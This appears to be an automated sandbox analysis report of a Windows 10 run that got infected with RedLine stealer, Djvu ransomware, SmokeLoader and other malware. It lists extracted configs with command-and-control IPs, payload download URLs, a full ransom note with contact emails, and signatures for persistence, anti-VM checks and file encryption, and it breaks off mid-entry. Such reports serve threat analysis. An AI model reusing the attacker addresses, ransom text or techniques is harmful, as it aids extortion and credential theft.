Analysis
-
max time kernel
1800s -
max time network
1803s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12-09-2022 18:07
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.logixoft.com/es-es/index
Resource
win10v2004-20220812-en
General
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\5068_1412926883\us_tv_and_film.txt
Extracted
C:\Users\Admin\AppData\Local\Temp\20004_2028133613\us_tv_and_film.txt
Extracted
C:\_readme.txt
djvu
support@bestyourmail.ch
datarestorehelp@airmail.cc
https://we.tl/t-xuPJqoyzQE
Extracted
redline
5
79.110.62.196:26277
-
auth_value
febe6965b41d2583ad2bb6b5aa23cfd5
Extracted
redline
nam6.2
103.89.90.61:34589
-
auth_value
4040fe7c77de89cf1a6f4cebd515c54c
Extracted
redline
ruzki14
176.113.115.146:9582
-
auth_value
688c6d70531c05d3fba22723e72366f6
Extracted
redline
sep10as1
185.215.113.122:15386
-
auth_value
e45012eae57b2e57b34752fc802550c3
Extracted
redline
Lyla.11.09
185.215.113.216:21921
-
auth_value
a1e5192e588aa983d678ceb4d6e0d8b5
Extracted
nymaim
208.67.104.97
85.31.46.167
Extracted
djvu
http://acacaca.org/test3/get.php
-
extension
.eemv
-
offline_id
5IVlpkccZlJz0AZ5atgGWVKe9CGAnXjohDf40mt1
-
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-0e5rCKsYCc Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0560Jhyjd
Extracted
redline
3108_RUZKI
213.219.247.199:9452
-
auth_value
f71fed1cd094e4e1eb7ad1c53e542bca
Signatures
-
DcRat 10 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exechrome.exeOtV01fNRpBSqIMPnvBIz_5U1.exeschtasks.exeschtasks.exeschtasks.exexsv.exeschtasks.exepid process 13516 schtasks.exe 19632 schtasks.exe 22684 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ece638ff-5062-40ce-bed5-d6d234b910ab\\OtV01fNRpBSqIMPnvBIz_5U1.exe\" --AutoStart" OtV01fNRpBSqIMPnvBIz_5U1.exe 15500 schtasks.exe 15844 schtasks.exe 15852 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " xsv.exe 70448 schtasks.exe -
Detected Djvu ransomware 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2400-325-0x0000000002320000-0x000000000243B000-memory.dmp family_djvu behavioral1/memory/5632-345-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2220-347-0x00000000001C0000-0x00000000001C9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6460 51008 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 12352 51008 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1520 51008 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2412-196-0x0000000000A70000-0x0000000000AD0000-memory.dmp family_redline behavioral1/memory/4028-203-0x00000000009D0000-0x00000000009F8000-memory.dmp family_redline behavioral1/memory/50916-252-0x0000000000400000-0x0000000000460000-memory.dmp family_redline behavioral1/memory/50956-255-0x00000000007D0000-0x00000000007F8000-memory.dmp family_redline behavioral1/memory/2068-336-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
svchost.exedescription pid process target process PID 12548 created 12396 12548 svchost.exe E35.exe PID 12548 created 13416 12548 svchost.exe csrss.exe PID 12548 created 13416 12548 svchost.exe csrss.exe PID 12548 created 13416 12548 svchost.exe csrss.exe PID 12548 created 13416 12548 svchost.exe csrss.exe PID 12548 created 20616 12548 svchost.exe f801950a962ddba14caaa44bf084b55c.exe PID 12548 created 20616 12548 svchost.exe f801950a962ddba14caaa44bf084b55c.exe -
Enumerates VirtualBox registry keys 2 TTPs 30 IoCs
Processes:
software_reporter_tool.exesoftware_reporter_tool.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\ software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\ software_reporter_tool.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\ImagePath software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\Performance taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\Performance taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\Parameters software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\Parameters software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\Performance taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest software_reporter_tool.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\ software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\Parameters software_reporter_tool.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\ImagePath software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\Performance taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\Parameters software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\ software_reporter_tool.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF software_reporter_tool.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF\ImagePath software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest\Parameters software_reporter_tool.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse\ImagePath software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\Performance taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService software_reporter_tool.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService\ImagePath software_reporter_tool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo\ software_reporter_tool.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo software_reporter_tool.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Updater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Updater.exe -
Blocklisted process makes network request 10 IoCs
Processes:
cmd.exemsiexec.exeflow pid process 610 5564 cmd.exe 621 5564 cmd.exe 629 5564 cmd.exe 631 5564 cmd.exe 633 5564 cmd.exe 1248 5564 cmd.exe 1252 5564 cmd.exe 1410 46012 msiexec.exe 1435 5564 cmd.exe 1439 5564 cmd.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 7 IoCs
Processes:
MsiExec.exerkfree_setup64.exedescription ioc process File opened for modification C:\Windows\system32\DRIVERS\klif.sys MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\SETC14B.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SETC14B.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\klflt.sys MsiExec.exe File opened for modification C:\Windows\SysWOW64\drivers\rvlkl.sys rkfree_setup64.exe File opened for modification C:\Windows\system32\DRIVERS\SETC14A.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SETC14A.tmp MsiExec.exe -
Executes dropped EXE 64 IoCs
Processes:
rkfree_setup64.exervlkl.exervlkl.exeQ_al8h5yJr2pfKnyjDa7K4bP.exeqkftJGDPHrj6GpoYfaz9kGzw.exe9ttTG63SaCJEubu9iGdOslGV.exeHees5gyHhxQ9S2TKRxCAvjcm.exeX70ItBxukSvymp13PgQhBSOh.exeOtV01fNRpBSqIMPnvBIz_5U1.exe8yRrDWZmXks9IvL_IS0nj_06.exe0ESIFYudXNYZaYrWCRa9HdY_.exerd1hX32qxbTEj_w1iCuwV_j3.exeiZr04NHQo2wt4BXC1sIRm5E6.exeepJtHFnMJr1xk7GmIRKBf6e5.exeMmwt5y3s3zj3YZRq2H7QWLkZ.exeVFAG5UfCz7e3IdvdI8v01u_M.exevqaxOmEozavyS1F_VZNHcPSf.exetW7Y0_b8aGCZGB9K4Cnu3Izl.exenIS_6lAPkuiAD1vGQNmAscKo.exe1GPK0P7aXVq71TQv22DqyPmM.exejR5Q7PgDKXRyFifhSjYEWAo0.execNqK1rl2lwvcIXjaMDuEDhDV.exeSpCSbJF2gtnaYf15VB7gkWOO.exemRs1315_U1bIiV5F6j7EgWjc.exeHees5gyHhxQ9S2TKRxCAvjcm.exejR5Q7PgDKXRyFifhSjYEWAo0.tmpjava.exeepJtHFnMJr1xk7GmIRKBf6e5.exe49AAFB727CL5GDI.exe49AAFB727CL5GDI.exe0M20GBJKA66FG9A.exe0M20GBJKA66FG9A.exeKBHKAC88D1F3HM2.exedllhusts.exeKBHKAC88D1F3HM2.exedllhusts.exeMID2G1BELCG7H55.exeKD005C2835911EG.exeuEu3BlPDRxDD3lXheMCJwF3k.exehe1ZfC3bR4eCfnDzT1OlvgXI.exeOtV01fNRpBSqIMPnvBIz_5U1.exeUpdater.exeOtV01fNRpBSqIMPnvBIz_5U1.exeOtV01fNRpBSqIMPnvBIz_5U1.exebuild2.exexsv.exefilezilla.exebuild3.exebuild2.exeRehab.exe.pifE01D.exe80E3.exe8B35.exe9BFF.exe9BFF.exeAA09.exeAA09.exeCDFD.exeF3F5.exeE35.exeE35.exe1CEC.execsrss.exe1CEC.exepid process 6028 rkfree_setup64.exe 5228 rvlkl.exe 3496 rvlkl.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 3608 qkftJGDPHrj6GpoYfaz9kGzw.exe 3264 9ttTG63SaCJEubu9iGdOslGV.exe 2612 Hees5gyHhxQ9S2TKRxCAvjcm.exe 1944 X70ItBxukSvymp13PgQhBSOh.exe 2400 OtV01fNRpBSqIMPnvBIz_5U1.exe 3548 8yRrDWZmXks9IvL_IS0nj_06.exe 2220 0ESIFYudXNYZaYrWCRa9HdY_.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3720 epJtHFnMJr1xk7GmIRKBf6e5.exe 3836 Mmwt5y3s3zj3YZRq2H7QWLkZ.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 4324 vqaxOmEozavyS1F_VZNHcPSf.exe 5292 tW7Y0_b8aGCZGB9K4Cnu3Izl.exe 2412 nIS_6lAPkuiAD1vGQNmAscKo.exe 5316 1GPK0P7aXVq71TQv22DqyPmM.exe 3956 jR5Q7PgDKXRyFifhSjYEWAo0.exe 5988 cNqK1rl2lwvcIXjaMDuEDhDV.exe 4028 SpCSbJF2gtnaYf15VB7gkWOO.exe 4288 mRs1315_U1bIiV5F6j7EgWjc.exe 2204 Hees5gyHhxQ9S2TKRxCAvjcm.exe 12868 jR5Q7PgDKXRyFifhSjYEWAo0.tmp 4784 java.exe 44000 epJtHFnMJr1xk7GmIRKBf6e5.exe 40852 49AAFB727CL5GDI.exe 50956 49AAFB727CL5GDI.exe 51104 0M20GBJKA66FG9A.exe 50772 0M20GBJKA66FG9A.exe 50840 KBHKAC88D1F3HM2.exe 744 dllhusts.exe 47800 KBHKAC88D1F3HM2.exe 3772 dllhusts.exe 4244 MID2G1BELCG7H55.exe 4944 KD005C2835911EG.exe 1732 uEu3BlPDRxDD3lXheMCJwF3k.exe 3488 he1ZfC3bR4eCfnDzT1OlvgXI.exe 5632 OtV01fNRpBSqIMPnvBIz_5U1.exe 8360 Updater.exe 8820 OtV01fNRpBSqIMPnvBIz_5U1.exe 11168 OtV01fNRpBSqIMPnvBIz_5U1.exe 4364 build2.exe 3396 xsv.exe 6136 filezilla.exe 10952 build3.exe 11340 build2.exe 11480 Rehab.exe.pif 11748 E01D.exe 11976 80E3.exe 11996 8B35.exe 12168 9BFF.exe 12256 9BFF.exe 12940 AA09.exe 12752 AA09.exe 13056 CDFD.exe 13244 F3F5.exe 12396 E35.exe 12576 E35.exe 12596 1CEC.exe 13416 csrss.exe 13612 1CEC.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
1CEC.exeOtV01fNRpBSqIMPnvBIz_5U1.exedescription ioc process File renamed C:\Users\Admin\Pictures\UnregisterEnter.tiff => C:\Users\Admin\Pictures\UnregisterEnter.tiff.mmdt 1CEC.exe File opened for modification C:\Users\Admin\Pictures\SendSelect.tif.mmdt OtV01fNRpBSqIMPnvBIz_5U1.exe File opened for modification C:\Users\Admin\Pictures\SyncUnlock.crw.mmdt OtV01fNRpBSqIMPnvBIz_5U1.exe File renamed C:\Users\Admin\Pictures\SyncUnlock.crw => C:\Users\Admin\Pictures\SyncUnlock.crw.mmdt 1CEC.exe File opened for modification C:\Users\Admin\Pictures\UnregisterEnter.tiff 1CEC.exe File opened for modification C:\Users\Admin\Pictures\ResolveMount.tif.mmdt OtV01fNRpBSqIMPnvBIz_5U1.exe File opened for modification C:\Users\Admin\Pictures\UnregisterEnter.tiff.mmdt OtV01fNRpBSqIMPnvBIz_5U1.exe File renamed C:\Users\Admin\Pictures\ResolveMount.tif => C:\Users\Admin\Pictures\ResolveMount.tif.mmdt 1CEC.exe File renamed C:\Users\Admin\Pictures\SendSelect.tif => C:\Users\Admin\Pictures\SendSelect.tif.mmdt 1CEC.exe -
Processes:
resource yara_rule behavioral1/memory/1944-209-0x0000000140000000-0x0000000140604000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Updater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Updater.exe -
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1GPK0P7aXVq71TQv22DqyPmM.exeMID2G1BELCG7H55.exeAA09.exebuild2.exe8yRrDWZmXks9IvL_IS0nj_06.exeepJtHFnMJr1xk7GmIRKBf6e5.exedllhusts.exenIS_6lAPkuiAD1vGQNmAscKo.exeOtV01fNRpBSqIMPnvBIz_5U1.exe1CEC.exerkfree_setup64.exeOtV01fNRpBSqIMPnvBIz_5U1.exebuild2.exe9BFF.exe1CEC.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 1GPK0P7aXVq71TQv22DqyPmM.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation MID2G1BELCG7H55.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation AA09.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 8yRrDWZmXks9IvL_IS0nj_06.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation epJtHFnMJr1xk7GmIRKBf6e5.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation dllhusts.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation nIS_6lAPkuiAD1vGQNmAscKo.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation OtV01fNRpBSqIMPnvBIz_5U1.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 1CEC.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation rkfree_setup64.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation OtV01fNRpBSqIMPnvBIz_5U1.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 9BFF.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 1CEC.exe -
Loads dropped DLL 64 IoCs
Processes:
regsvr32.exejava.exeregsvr32.exerundll32.exefilezilla.exebuild2.exesvchost.exeregsvr32.exerundll32.exerundll32.exetaskmgr.exetor.exebuild2.exesoftware_reporter_tool.exekav21.3.10.391en_26075.exeTEST_WPF.EXEMsiExec.exepid process 12632 regsvr32.exe 4784 java.exe 4784 java.exe 4784 java.exe 4180 regsvr32.exe 6496 rundll32.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 6136 filezilla.exe 11340 build2.exe 11340 build2.exe 11340 build2.exe 11272 svchost.exe 11272 svchost.exe 11816 regsvr32.exe 11816 regsvr32.exe 12372 rundll32.exe 1248 rundll32.exe 8276 taskmgr.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 70496 tor.exe 15284 build2.exe 15284 build2.exe 15284 build2.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 41308 software_reporter_tool.exe 44904 kav21.3.10.391en_26075.exe 44508 TEST_WPF.EXE 44904 kav21.3.10.391en_26075.exe 44904 kav21.3.10.391en_26075.exe 46088 MsiExec.exe 46088 MsiExec.exe 46088 MsiExec.exe 46088 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
msedge.exemsedge.exe9ttTG63SaCJEubu9iGdOslGV.exeOtV01fNRpBSqIMPnvBIz_5U1.exexsv.exeE35.execsrss.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 9ttTG63SaCJEubu9iGdOslGV.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9ttTG63SaCJEubu9iGdOslGV.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ece638ff-5062-40ce-bed5-d6d234b910ab\\OtV01fNRpBSqIMPnvBIz_5U1.exe\" --AutoStart" OtV01fNRpBSqIMPnvBIz_5U1.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run xsv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" E35.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " xsv.exe -
Checks for any installed AV software in registry 1 TTPs 48 IoCs
Processes:
kav21.3.10.391en_26075.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Anchor Underline kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Play_Animations kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Print_Background kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Disable Script Debugger kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\DisableScriptDebuggerIE kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Q300829 kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Cleanup HTCs kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\XDomainRequest kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\JScriptProfileCacheEventDelay kav21.3.10.391en_26075.exe Key queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\CSS_Compat kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\XMLHTTP kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Settings kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\AdvancedOptions\DISAMBIGUATION kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\RtfConverterFlags kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Expand Alt Text kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Display Inline Videos kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Disable Diagnostics Mode kav21.3.10.391en_26075.exe Key queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Show image placeholders kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\DOMStorage kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Viewport kav21.3.10.391en_26075.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\KasperskyLab\IEOverride\Main kav21.3.10.391en_26075.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Enable Browser Extensions = "no" kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\KasperskyLab\IEOverride kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Play_Background_Sounds kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\International kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\International\Scripts\3 kav21.3.10.391en_26075.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\International\Scripts\4 kav21.3.10.391en_26075.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast kav21.3.10.391en_26075.exe Key queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab kav21.3.10.391en_26075.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main kav21.3.10.391en_26075.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\KasperskyLab\IEOverride\Main\Use_DlgBox_Colors kav21.3.10.391en_26075.exe Key value 